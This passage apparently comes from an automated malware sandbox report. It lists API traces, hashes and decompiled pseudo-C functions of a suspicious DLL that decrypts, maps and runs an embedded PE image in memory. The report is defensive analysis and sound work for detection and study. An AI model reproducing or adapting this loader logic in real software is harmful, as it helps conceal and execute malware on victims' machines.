                                                                                                              • Part of subcall function 6F031000: HeapAlloc.KERNEL32(00000000,?,6F0315ED,00000030,747863F0,00000000), ref: 6F03100C
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6F031051,?,?,?,?), ref: 6F0319E6
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A08
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A1E
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A34
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A4A
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6F031A60
                                                                                                              • Part of subcall function 6F0313B8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 6F031415
                                                                                                              • Part of subcall function 6F0313B8: memset.NTDLL ref: 6F031437
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1632424568-0
                                                                                                            • Opcode ID: ee4442e368b9def4b294c75962c071ad4d75d69f4acbc33b68e357789b401b00
                                                                                                            • Instruction ID: cb66a763e637dda73a224119b9a19d0cc2877153e4d9a7cacb0250f8009bf1e4
                                                                                                            • Opcode Fuzzy Hash: ee4442e368b9def4b294c75962c071ad4d75d69f4acbc33b68e357789b401b00
                                                                                                            • Instruction Fuzzy Hash: 18213D77A00F1BAFDB11DF69CD80E6ABBECFF0A2107004566E515CB251E771E9049BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E6F0312B5(void* __eax, void* _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				long _v20;
                                                                                                            				int _t43;
                                                                                                            				long _t54;
                                                                                                            				signed int _t57;
                                                                                                            				void* _t58;
                                                                                                            				signed int _t60;
                                                                                                            
                                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                                            				_t57 =  *0x6f0341c0;
                                                                                                            				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                            				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                            				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                            				if(_v16 <= 0) {
                                                                                                            					L12:
                                                                                                            					return _v12;
                                                                                                            				} else {
                                                                                                            					goto L1;
                                                                                                            				}
                                                                                                            				while(1) {
                                                                                                            					L1:
                                                                                                            					_t60 = _v12;
                                                                                                            					if(_t60 != 0) {
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            					asm("bt [esi+0x24], eax");
                                                                                                            					if(_t60 >= 0) {
                                                                                                            						asm("bt [esi+0x24], eax");
                                                                                                            						if(__eflags >= 0) {
                                                                                                            							L8:
                                                                                                            							_t54 = _t57 - 0x69b25f40;
                                                                                                            							L9:
                                                                                                            							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                            							if(_t43 == 0) {
                                                                                                            								_v12 = GetLastError();
                                                                                                            							}
                                                                                                            							_v8 = _v8 + 1;
                                                                                                            							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                                                                                            							if(_v8 < _v16) {
                                                                                                            								continue;
                                                                                                            							} else {
                                                                                                            								goto L12;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						asm("bt [esi+0x24], eax");
                                                                                                            						_t54 = _t57 - 0x69b25f42;
                                                                                                            						if(__eflags >= 0) {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            					asm("bt [esi+0x24], eax");
                                                                                                            					if(_t60 >= 0) {
                                                                                                            						_t54 = _t57 - 0x69b25f24;
                                                                                                            					} else {
                                                                                                            						_t54 = _t57 - 0x69b25f04;
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				}
                                                                                                            				goto L12;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6F0312EE
                                                                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6F031363
                                                                                                            • GetLastError.KERNEL32 ref: 6F031369
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual$ErrorLast
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 1469625949-1084903527
                                                                                                            • Opcode ID: 9c92e17244bb6aa7f12a1114502c9799d97a43a4fb5faf7ddde105bea1697c18
                                                                                                            • Instruction ID: fb8928282be416338655db6657d4b1c020d2a597a84457a02d8da99f42f2e4c4
                                                                                                            • Opcode Fuzzy Hash: 9c92e17244bb6aa7f12a1114502c9799d97a43a4fb5faf7ddde105bea1697c18
                                                                                                            • Instruction Fuzzy Hash: CD212772D0021AEFCB18CB95C985AAAF7F4EF0C355F414459E502D7408E7B4A668CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DC338,000008BB), ref: 6F04D345
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID: 1$N
                                                                                                            • API String ID: 514040917-3127171972
                                                                                                            • Opcode ID: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction ID: 145c3df08cd0ec8d591a1cf2ed114b003f68e25b2a4aeac651a5d9991316f75b
                                                                                                            • Opcode Fuzzy Hash: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction Fuzzy Hash: C4035E71904952CECB08CF69CE907787FF2FB57325B24816ADD458728BE33955A8EB08
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E6F03189E(void* __edi, intOrPtr _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				unsigned int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				char _v24;
                                                                                                            				void* _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				void* _v40;
                                                                                                            				signed int _v48;
                                                                                                            				signed int _v52;
                                                                                                            				intOrPtr _t46;
                                                                                                            				void* _t53;
                                                                                                            				intOrPtr _t54;
                                                                                                            				intOrPtr _t57;
                                                                                                            				signed int _t66;
                                                                                                            				intOrPtr _t68;
                                                                                                            				intOrPtr _t83;
                                                                                                            				void* _t84;
                                                                                                            
                                                                                                            				_t83 =  *0x6f0341b0;
                                                                                                            				_t46 = E6F032016(_t83,  &_v24,  &_v16);
                                                                                                            				_v20 = _t46;
                                                                                                            				if(_t46 == 0) {
                                                                                                            					asm("sbb ebx, ebx");
                                                                                                            					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                                                                            					_t84 = _t83 + _v24;
                                                                                                            					_v40 = _t84;
                                                                                                            					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
                                                                                                            					_v28 = _t53;
                                                                                                            					if(_t53 == 0) {
                                                                                                            						_v20 = 8;
                                                                                                            					} else {
                                                                                                            						_v8 = _v8 & 0x00000000;
                                                                                                            						if(_t66 <= 0) {
                                                                                                            							_t54 =  *0x6f0341c0;
                                                                                                            						} else {
                                                                                                            							_t68 = _a4;
                                                                                                            							_t57 = _t53 - _t84;
                                                                                                            							_t13 = _t68 + 0x6f0351a7; // 0x6f0351a7
                                                                                                            							_v32 = _t57;
                                                                                                            							_v36 = _t57 + _t13;
                                                                                                            							_v12 = _t84;
                                                                                                            							while(1) {
                                                                                                            								asm("movsd");
                                                                                                            								asm("movsd");
                                                                                                            								asm("movsd");
                                                                                                            								E6F031AA6(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
                                                                                                            								_v12 = _v12 + 0x1000;
                                                                                                            								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                                                                                                            								_v8 = _v8 + 1;
                                                                                                            								 *0x6f0341c0 = _t54;
                                                                                                            								if(_v8 >= _t66) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t57 = _v32;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(_t54 != 0x69b25f44) {
                                                                                                            							_v20 = 9;
                                                                                                            						} else {
                                                                                                            							memcpy(_v40, _v28, _v16);
                                                                                                            						}
                                                                                                            						VirtualFree(_v28, 0, 0x8000); // executed
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _v20;
                                                                                                            			}






















                                                                                                            0x6f03198f
                                                                                                            0x6f031994
                                                                                                            0x6f0319aa
                                                                                                            0x6f0319aa
                                                                                                            0x6f0319b9
                                                                                                            0x6f0319bf

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000,747863F0,00003000,00000004,00000030,00000000,747863F0,00000000,?,?,?,?,?,?,6F03163B,00000000), ref: 6F0318F4
                                                                                                            • memcpy.NTDLL(?,6F03163B,747863F0,?,?,?,?,?,?,6F03163B,00000000,00000030,747863F0,00000000), ref: 6F03198F
                                                                                                            • VirtualFree.KERNELBASE(6F03163B,00000000,00008000,?,?,?,?,?,?,6F03163B,00000000), ref: 6F0319AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$AllocFreememcpy
                                                                                                            • String ID: Sep 18 2021
                                                                                                            • API String ID: 4010158826-1373364653
                                                                                                            • Opcode ID: 98ec96ca8c6cb688d975631c89abba90633d056419f2e2505848caab108394c4
                                                                                                            • Instruction ID: 81f333260339334a22d6e79c43e6b1ac08492f2b275f020167e31f3df806a18b
                                                                                                            • Opcode Fuzzy Hash: 98ec96ca8c6cb688d975631c89abba90633d056419f2e2505848caab108394c4
                                                                                                            • Instruction Fuzzy Hash: 65313376D0061AEFDB01CF98D991BEEB7B8FF09308F104159E905BB285D775AA05CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E6F031719(void* __ecx, char _a4) {
                                                                                                            				long _t3;
                                                                                                            				int _t4;
                                                                                                            				int _t9;
                                                                                                            				void* _t13;
                                                                                                            
                                                                                                            				_t13 = GetCurrentThread();
                                                                                                            				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                            				if(_t3 != 0) {
                                                                                                            					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                            				}
                                                                                                            				_t4 = E6F0315C6(_a4); // executed
                                                                                                            				_t9 = _t4;
                                                                                                            				if(_t9 == 0) {
                                                                                                            					SetThreadPriority(_t13, _t4);
                                                                                                            				}
                                                                                                            				asm("lock xadd [eax], ecx");
                                                                                                            				return _t9;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetCurrentThread.KERNEL32 ref: 6F03171C
                                                                                                            • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6F031727
                                                                                                            • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6F03173A
                                                                                                            • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6F03174D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                            • String ID:
                                                                                                            • API String ID: 1452675757-0
                                                                                                            • Opcode ID: 135c59c5e43f27b67bc29228f80b32c41af398c95e80fa409c6d08158a76a339
                                                                                                            • Instruction ID: 54b70ab939c1ed9d5fbf29c917032a51289de12aca2919b1f73e38d18381c992
                                                                                                            • Opcode Fuzzy Hash: 135c59c5e43f27b67bc29228f80b32c41af398c95e80fa409c6d08158a76a339
                                                                                                            • Instruction Fuzzy Hash: 3DE09237B06B236BA7212A294CD5F6B7BACEF9A3317010236F520962D0DB509C1295A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E6F031015(void* __eax) {
                                                                                                            				char _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* __edi;
                                                                                                            				void* _t18;
                                                                                                            				long _t24;
                                                                                                            				long _t26;
                                                                                                            				long _t29;
                                                                                                            				intOrPtr _t40;
                                                                                                            				void* _t41;
                                                                                                            				intOrPtr* _t42;
                                                                                                            				void* _t44;
                                                                                                            
                                                                                                            				_t41 = __eax;
                                                                                                            				_t16 =  *0x6f0341c0;
                                                                                                            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6f0341c0 - 0x69b24f45 &  !( *0x6f0341c0 - 0x69b24f45);
                                                                                                            				_t18 = E6F0319C2( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6f0341c0 - 0x69b24f45 &  !( *0x6f0341c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6f0341c0 - 0x69b24f45 &  !( *0x6f0341c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                                                                                            				if(_t18 != 0) {
                                                                                                            					_t29 = 8;
                                                                                                            					goto L8;
                                                                                                            				} else {
                                                                                                            					_t40 = _v8;
                                                                                                            					_t29 = E6F031798(_t33, _t40, _t41);
                                                                                                            					if(_t29 == 0) {
                                                                                                            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                            						_t24 = E6F031DE5(_t40, _t44); // executed
                                                                                                            						_t29 = _t24;
                                                                                                            						if(_t29 == 0) {
                                                                                                            							_t26 = E6F0312B5(_t44, _t40); // executed
                                                                                                            							_t29 = _t26;
                                                                                                            							if(_t29 == 0) {
                                                                                                            								_push(_t26);
                                                                                                            								_push(1);
                                                                                                            								_push(_t40);
                                                                                                            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                            									_t29 = GetLastError();
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t42 = _v12;
                                                                                                            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                            					E6F031397(_t42);
                                                                                                            					L8:
                                                                                                            					return _t29;
                                                                                                            				}
                                                                                                            			}















                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0319C2: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6F031051,?,?,?,?), ref: 6F0319E6
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A08
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A1E
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A34
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A4A
                                                                                                              • Part of subcall function 6F0319C2: GetProcAddress.KERNEL32(00000000,?), ref: 6F031A60
                                                                                                              • Part of subcall function 6F031798: memcpy.NTDLL(?,?,?,?,?,?,?,?,6F03105F,?,?,?,?,?,?), ref: 6F0317CF
                                                                                                              • Part of subcall function 6F031798: memcpy.NTDLL(?,?,?), ref: 6F031804
                                                                                                              • Part of subcall function 6F031DE5: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6F031E1D
                                                                                                              • Part of subcall function 6F0312B5: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6F0312EE
                                                                                                              • Part of subcall function 6F0312B5: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6F031363
                                                                                                              • Part of subcall function 6F0312B5: GetLastError.KERNEL32 ref: 6F031369
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?), ref: 6F031093
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 2673762927-1084903527
                                                                                                            • Opcode ID: 858a5834252a445da9b88b1e4f58237f263144bb4cfb8704a5e445ceaf7b4f75
                                                                                                            • Instruction ID: b43391c958993934d1fc6cbb2d8acff62ae3d9eeed88d1b9ae1787b4bb155a65
                                                                                                            • Opcode Fuzzy Hash: 858a5834252a445da9b88b1e4f58237f263144bb4cfb8704a5e445ceaf7b4f75
                                                                                                            • Instruction Fuzzy Hash: 42110B37E007236BC3219AA58C94FAF77FCAF8D3147004519EA029B541DBA1FD054790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F0310B9() {
                                                                                                            				char _v16;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void _v32;
                                                                                                            				void* _v36;
                                                                                                            				intOrPtr _t15;
                                                                                                            				void* _t16;
                                                                                                            				long _t25;
                                                                                                            				int _t26;
                                                                                                            				void* _t30;
                                                                                                            				intOrPtr* _t32;
                                                                                                            				signed int _t36;
                                                                                                            				intOrPtr _t39;
                                                                                                            
                                                                                                            				_t15 =  *0x6f0341c4;
                                                                                                            				if( *0x6f0341ac > 5) {
                                                                                                            					_t16 = _t15 + 0x6f0350f9;
                                                                                                            				} else {
                                                                                                            					_t16 = _t15 + 0x6f0350b1;
                                                                                                            				}
                                                                                                            				E6F0315A0(_t16, _t16);
                                                                                                            				_t36 = 6;
                                                                                                            				memset( &_v32, 0, _t36 << 2);
                                                                                                            				if(E6F031EF0( &_v32,  &_v16,  *0x6f0341c0 ^ 0xf7a71548) == 0) {
                                                                                                            					_t25 = 0xb;
                                                                                                            				} else {
                                                                                                            					_t26 = lstrlenW( *0x6f0341b8);
                                                                                                            					_t8 = _t26 + 2; // 0x2
                                                                                                            					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                            					_t30 = E6F031172(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                            					if(_t30 == 0) {
                                                                                                            						_t32 = _v36;
                                                                                                            						 *_t32 = 0;
                                                                                                            						if( *0x6f0341b8 == 0) {
                                                                                                            							 *((short*)(_t32 + 4)) = 0;
                                                                                                            						} else {
                                                                                                            							E6F032070(_t44, _t32 + 4);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t25 = E6F031015(_v28); // executed
                                                                                                            				}
                                                                                                            				ExitThread(_t25);
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2636182767-0
                                                                                                            • Opcode ID: ff967f22ffc9bdf9fe623924b368602687e887784d7837021c342d6b13d2a60a
                                                                                                            • Instruction ID: b4b7ab2bc0f1b21821c713a1d0dabef79a679a2f8b97b3f5146dd16201a82083
                                                                                                            • Opcode Fuzzy Hash: ff967f22ffc9bdf9fe623924b368602687e887784d7837021c342d6b13d2a60a
                                                                                                            • Instruction Fuzzy Hash: 44119D77D08B17AADB21CBA8CC48F8B77EDBB4A314F010926E441D7190E731E5088B92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,6F0DA0D4,00000000), ref: 6F0914AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction ID: 102dfec6744d56ac5575113623db97253016d7f2ccc805435d2adfd98f5a0dc4
                                                                                                            • Opcode Fuzzy Hash: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction Fuzzy Hash: B1F0E931789A2456EB119A768804F9F37DDAF4A770B119262EC28DB1C0EB34E801A6E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 6F08F529
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: bbaae7232eb3889bfced48634e0d62a3086500dbaecdc9438ab595ed358073cf
                                                                                                            • Instruction ID: 7132b3829e5a989e53b794debed5116f57c24e90000e426a7c5c9432533bc356
                                                                                                            • Opcode Fuzzy Hash: bbaae7232eb3889bfced48634e0d62a3086500dbaecdc9438ab595ed358073cf
                                                                                                            • Instruction Fuzzy Hash: DAE0ED712457225AEF111E799C04B8B3BCCAF433F2F0102A1EE34D72C0EB20E90281E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlEncodePointer.NTDLL(?), ref: 6F055C69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2118026453-0
                                                                                                            • Opcode ID: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction ID: 18d34cb1b9aa7f214233c6aead2b22566878d65c0e47463362096e6cac607536
                                                                                                            • Opcode Fuzzy Hash: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction Fuzzy Hash: 26D092B0008E199BDF049F44EC047643FB4F706376F604229E81D83296D7315470EA44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 37%
                                                                                                            			E6F0315A0(void* __eax, intOrPtr _a4) {
                                                                                                            
                                                                                                            				 *0x6f0341d0 =  *0x6f0341d0 & 0x00000000;
                                                                                                            				_push(0);
                                                                                                            				_push(0x6f0341cc);
                                                                                                            				_push(1);
                                                                                                            				_push(_a4);
                                                                                                            				 *0x6f0341c8 = 0xc; // executed
                                                                                                            				L6F031764(); // executed
                                                                                                            				return __eax;
                                                                                                            			}




                                                                                                            APIs
                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6F0310E6,00000001,6F0341CC,00000000), ref: 6F0315BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: DescriptorSecurity$ConvertString
                                                                                                            • String ID:
                                                                                                            • API String ID: 3907675253-0
                                                                                                            • Opcode ID: e14118ad84b3a3f664fc6c2bcc2be390a7ec9fb972c054b3b63c16eb0b57b9f9
                                                                                                            • Instruction ID: 8c1d3fc437aa4e62067995e86c4230dad9240082d60f97084a0fc6a17116254a
                                                                                                            • Opcode Fuzzy Hash: e14118ad84b3a3f664fc6c2bcc2be390a7ec9fb972c054b3b63c16eb0b57b9f9
                                                                                                            • Instruction Fuzzy Hash: 32C04CBA980F13B6EB309B40CC85F557A61776671DF100604F504291C183F714649519
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E8E5
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E90E
                                                                                                            • GetACP.KERNEL32(?,?,6F09EB6A,?,00000000), ref: 6F09E923
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP$jo
                                                                                                            • API String ID: 2299586839-1723675111
                                                                                                            • Opcode ID: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction ID: b9038b26e503fdf3372fd5dba6b1beb4a290d0c80aad08930d05b0c569eee49d
                                                                                                            • Opcode Fuzzy Hash: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction Fuzzy Hash: FC21B322A04205A6E7248BA8C901B8B77F7FF45B64B569525EA1DDB241F732ED40E3B0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F031825() {
                                                                                                            				void* _t1;
                                                                                                            				unsigned int _t3;
                                                                                                            				void* _t4;
                                                                                                            				long _t5;
                                                                                                            				void* _t6;
                                                                                                            				intOrPtr _t10;
                                                                                                            				void* _t14;
                                                                                                            
                                                                                                            				_t10 =  *0x6f0341b0;
                                                                                                            				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                            				 *0x6f0341bc = _t1;
                                                                                                            				if(_t1 == 0) {
                                                                                                            					return GetLastError();
                                                                                                            				}
                                                                                                            				_t3 = GetVersion();
                                                                                                            				if(_t3 != 5) {
                                                                                                            					L4:
                                                                                                            					if(_t14 <= 0) {
                                                                                                            						_t4 = 0x32;
                                                                                                            						return _t4;
                                                                                                            					} else {
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(_t3 >> 8 > 0) {
